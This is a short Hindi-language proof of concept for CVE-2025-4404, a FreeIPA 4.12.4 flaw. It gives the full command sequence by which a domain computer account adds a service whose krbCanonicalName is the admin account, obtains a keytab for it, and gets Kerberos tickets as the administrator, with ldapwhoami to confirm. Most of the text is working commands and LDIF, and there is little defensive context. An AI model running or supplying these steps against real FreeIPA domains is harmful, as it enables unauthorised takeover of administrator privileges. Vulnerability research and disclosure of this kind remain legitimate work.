
CVE-2025-4404 के लिए POC
CVE-2025-4404 के लिए POC
यदि आपके पास एक डोमेन कंप्यूटर खाता (host/pc1.[email protected]) है, तो आप डिफ़ॉल्ट रूप से सेवा जोड़ सकते हैं। और आप krbPrincipalName और krbCanonicalName सेट कर सकते हैं। डिफ़ॉल्ट रूप से, FreeIPA 4.12.4 व्यवस्थापक खाते के लिए krbCanonicalName विशेषता मान मौजूद नहीं होता है। आप krbPrincipalName मान के साथ एक Kerberos टिकट का अनुरोध कर सकते हैं, लेकिन टिकट में krbCanonicalName मान होगा।
आगे बढ़ते हैं
पहले, हम कंप्यूटर खाते की ओर से एक टिकट का अनुरोध करेंगे:
$ kinit host/[email protected] -k -t /etc/krb5.keytab
LDAP सेवा खाते में जोड़ें:
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
$ kinit --no-request-pac -k -t ./test.keytab test/[email protected]PWN!!!
आप टिकट को इस प्रकार जाँच सकते हैं:
ldapwhoami -H ldap://dc1.test.local